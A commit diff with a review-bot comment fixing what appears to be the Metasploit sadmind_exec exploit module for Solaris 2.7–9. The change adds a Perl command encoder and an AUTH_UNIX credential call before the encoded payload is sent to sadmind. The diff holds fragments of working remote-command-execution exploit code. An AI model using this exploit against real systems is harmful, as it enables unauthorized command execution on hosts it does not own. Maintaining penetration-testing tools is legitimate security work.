Land #3518, @midnitesnake's fix for solaris sadmind_exec

bug/bundler_fix
jvazquez-r7 2014-10-27 17:19:06 -05:00
commit e6e4aaba3e
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 5 additions and 3 deletions


@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
Vulnerable systems include solaris 2.7, 8, and 9 Vulnerable systems include solaris 2.7, 8, and 9
}, },
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz' ], 'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
@ -35,9 +35,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
'Space' => 2000, 'Space' => 2000,
'BadChars' => "\x00", 'BadChars' => "\x00",
'DisableNops' => true, 'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
'Compat' => 'Compat' =>
{ {
'PayloadType' => 'cmd', 'PayloadType' => 'cmd',
@ -83,6 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
hostname = datastore['HOSTNAME'] hostname = datastore['HOSTNAME']
end end
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
response = sadmind_request(hostname, payload.encoded) response = sadmind_request(hostname, payload.encoded)
sunrpc_destroy sunrpc_destroy
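Review bot: The added `sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])` call in the last hunk reads two datastore options whose registration is not visible in this diff. If `UID` and `GID` are not declared with defaults in the module's option list, `nil` would reach the credential encoding, so that is worth confirming before merge. The line would also benefit from a one-line why-comment, since the reason is not evident from the code; presumably something like `# rebuild AUTH_UNIX credentials now that the hostname is known`. The enclosing method starts and ends outside the hunk, so any earlier `sunrpc_authunix` call that this one supersedes cannot be checked from here.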